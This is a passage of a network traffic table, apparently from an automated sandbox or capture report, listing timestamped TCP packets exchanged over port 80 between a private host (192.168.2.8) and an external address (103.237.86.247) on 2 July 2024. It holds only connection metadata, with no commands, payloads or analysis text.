                Jul 2, 2024 07:50:39.260812998 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.260847092 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.260863066 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.260924101 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.260935068 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.260946035 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.260957003 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.260972977 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.261009932 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.261634111 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.261698961 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.261709929 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.261750937 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.261755943 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.261771917 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.261806965 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.522032022 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.522067070 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.522078037 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.522093058 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.522103071 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.522114992 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.522138119 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.522167921 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.522481918 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.522526026 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.522536993 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.522576094 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.522594929 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.522661924 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.522672892 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.522685051 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.522696972 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.522715092 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.522744894 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.522825003 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.523235083 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.523284912 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.523324013 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.523335934 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.523365974 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.523395061 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.523457050 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.523468018 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.523479939 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.523490906 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.523510933 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.523541927 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.523622990 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.523633957 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.523678064 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.524110079 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.524152040 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.524214983 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.524228096 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.524259090 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.524291992 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.524394989 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.524405956 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.524418116 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.524429083 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.524447918 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.524477005 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.524600983 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.524612904 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.524658918 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.525166988 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.525243998 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.525254965 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.525286913 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.525304079 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.784025908 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.784316063 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.784332991 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.784344912 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.784354925 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.784377098 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.784388065 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.784400940 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.784410000 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.784418106 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.784420967 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.784447908 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.784466028 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.784491062 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.784579039 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.784616947 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.784632921 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.784646034 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.784672022 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.784686089 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.784718990 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.784909010 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.784950972 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.784962893 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.784975052 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.784998894 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.785027027 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.785128117 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.785140038 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.785151958 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.785165071 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.785167933 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.785197973 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.785316944 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.785329103 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.785366058 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.785804033 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.785824060 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.785835028 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.785845041 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.785876036 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.786021948 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.786032915 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.786043882 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.786056042 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.786063910 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.786082029 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.786108017 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.786196947 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.786207914 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.786232948 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.786250114 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.786710978 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.786751986 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.786763906 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.786793947 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.786823034 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.786917925 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.786928892 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.786941051 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.786952019 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.786962032 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.786992073 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.787108898 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.787120104 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.787147999 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.787170887 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.787686110 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.787745953 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.787758112 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.787794113 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.787817955 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.787904024 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.787915945 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.787928104 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.787939072 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.787950993 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.787980080 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:39.788054943 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:39.788089991 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.046034098 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.046061039 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.046072006 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.046097040 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.046122074 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.046144962 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.046156883 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.046168089 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.046180010 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.046185017 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.046214104 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.046369076 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.046380997 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.046411037 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.046437979 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.047003031 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.047039032 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.047054052 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.047071934 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.047099113 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.047111034 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.047132969 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.047151089 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.047214031 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.047224998 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.047261953 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.047333956 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.047346115 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.047357082 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.047375917 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.047405958 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.047420025 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.047465086 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.047494888 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.047503948 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.047528982 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.047548056 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.047569036 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.047579050 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.047626019 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.047626972 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.047668934 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.047758102 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.047769070 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.047806025 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.047821999 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.047832966 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.047866106 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.047890902 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.047931910 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.047944069 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.047979116 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.048036098 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.048085928 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.048096895 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.048125982 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.048142910 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.048197031 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.048207998 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.048218966 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.048252106 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.048281908 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.048326969 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.048376083 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.048391104 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.048403025 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.048424959 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.048451900 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.048521042 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.048532009 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.048568010 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.048597097 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.048656940 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.048666954 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.048674107 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.048707008 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.048808098 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.048820019 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.048830032 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.048841000 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.048856020 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.048876047 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.049063921 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.049074888 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.049086094 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.049097061 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.049108982 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.049129963 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.049259901 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.049271107 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.049282074 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.049292088 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.049309015 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.049329042 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.051232100 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.051285028 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.051290035 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.051302910 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.051322937 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.051327944 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.051332951 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.051346064 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.051368952 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.051417112 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.051428080 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.051450968 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.051469088 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.051573038 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.051583052 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.051593065 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.051604986 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.051616907 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.051646948 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.051682949 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.051724911 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.051759958 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.051769972 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.051781893 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.051791906 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.051791906 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.051810980 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.051836014 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.052073002 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.052103043 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.052113056 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.052138090 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.052170992 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.052220106 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.052231073 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.052283049 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.308163881 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.308211088 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.308221102 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.308264017 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.308269024 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.308274984 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.308309078 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.308309078 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.308309078 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.308321953 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.308393955 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.308406115 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.308470964 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.308489084 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.308598995 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.308598995 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.308598995 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.308598995 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.308603048 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.308613062 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.308634996 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.308646917 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.308655024 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.308656931 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.308669090 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.308676958 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.308690071 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.308717966 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.308835030 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.308877945 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.309113026 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.309154987 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.309161901 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.309171915 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.309196949 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.309215069 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.309274912 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.309286118 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.309298038 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.309310913 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.309315920 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.309334040 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.309364080 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.309459925 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.309501886 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.309526920 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.309565067 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.309585094 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.309596062 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.309608936 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.309629917 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.309643984 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.309752941 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.309763908 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.309775114 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.309786081 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.309794903 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.309801102 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.309828997 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.309854984 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.310045004 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.310055971 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.310066938 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.310077906 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.310087919 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.310089111 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.310101032 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.310106993 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.310112000 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.310123920 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.310136080 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.310157061 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.310344934 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.310386896 CEST6001880192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:40.310569048 CEST8060018103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:40.310580015 CEST8060018103.237.86.247192.168.2.8
